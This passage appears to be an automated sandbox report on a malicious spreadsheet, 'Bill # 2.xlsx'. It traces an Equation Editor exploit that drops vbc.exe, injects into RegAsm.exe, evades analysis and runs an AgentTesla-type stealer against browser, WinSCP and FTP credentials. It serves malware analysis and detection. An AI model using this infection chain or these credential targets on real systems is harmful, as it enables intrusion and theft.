                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_005257C07_2_005257C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0052AFC07_2_0052AFC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0052F0D07_2_0052F0D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00520C987_2_00520C98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0052AD107_2_0052AD10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00525D907_2_00525D90
                Source: Bill # 2.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                Source: tochi[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: vbc.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@10/10@3/2
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Bill # 2.xlsxJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE83C.tmpJump to behavior
                Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: Bill # 2.xlsxVirustotal: Detection: 31%
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                Source: unknownProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
                Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
                Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
                Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
                Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: Bill # 2.xlsxInitial sample: OLE indicators vbamacros = False
                Source: Bill # 2.xlsxInitial sample: OLE indicators encrypted = True
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00233860 pushfd ; iretd 7_2_00233865
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00231332 pushfd ; iretd 7_2_002313D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00231390 pushfd ; iretd 7_2_002313D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00520C40 push eax; ret 7_2_00520C8D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00521FF2 push eax; retf 7_2_00521FF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00521BF0 push eax; retf 0022h7_2_00521BF1
                Source: initial sampleStatic PE information: section name: .text entropy: 7.8672821185
                Source: initial sampleStatic PE information: section name: .text entropy: 7.8672821185
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\tochi[1].exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

                Boot Survival:

                barindex
                Drops PE files to the user root directoryShow sources
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: Bill # 2.xlsxStream path 'EncryptedPackage' entropy: 7.99819553665 (max. 8.0)

                Malware Analysis System Evasion:

                barindex
                Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 597Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2592Thread sleep time: -480000s >= -30000sJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2592Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Users\Public\vbc.exe TID: 2752Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2860Thread sleep time: -360000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3000Thread sleep count: 597 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -58908s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -56506s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -43402s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -40500s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -39408s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -38316s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -34416s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -32700s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -30298s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -59594s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -58690s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -56100s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -55694s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -55008s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -54102s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -52792s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -52200s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -51700s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -51108s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -50608s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -36506s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2968Thread sleep time: -34104s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2196Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeLast function: Thread delayed
                Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\Public\vbc.exeCode function: 4_2_003F00AD mov ecx, dword ptr fs:[00000030h]4_2_003F00AD
                Source: C:\Users\Public\vbc.exeCode function: 4_2_003F00AD mov eax, dword ptr fs:[00000030h]4_2_003F00AD
                Source: C:\Users\Public\vbc.exeCode function: 4_2_003F01CB mov eax, dword ptr fs:[00000030h]4_2_003F01CB
                Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion:

                barindex
                Maps a DLL or memory area into another processShow sources
                Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe protection: execute and read and writeJump to behavior
                Writes to foreign memory regionsShow sources
                Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
                Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
                Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
                Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeJump to behavior
                Source: RegAsm.exe, 00000007.00000002.2360054157.0000000000EC0000.00000002.00000001.sdmpBinary or memory string: Program Manager
                Source: RegAsm.exe, 00000007.00000002.2360054157.0000000000EC0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                Source: RegAsm.exe, 00000007.00000002.2360054157.0000000000EC0000.00000002.00000001.sdmpBinary or memory string: !Progman
                Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information:

                barindex
                Yara detected AgentTeslaShow sources
                Source: Yara matchFile source: 00000007.00000002.2360877305.00000000029FF000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2167918680.000000000071B000.00000004.00000020.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2360916542.0000000002A3A000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2360731218.0000000002931000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2167794246.0000000000462000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2359672684.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2170414969.0000000004127000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2708, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2364, type: MEMORY
                Source: Yara matchFile source: 7.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.vbc.exe.460000.0.unpack, type: UNPACKEDPE
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                Tries to harvest and steal browser information (history, passwords, etc)Show sources
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Tries to harvest and steal ftp login credentialsShow sources
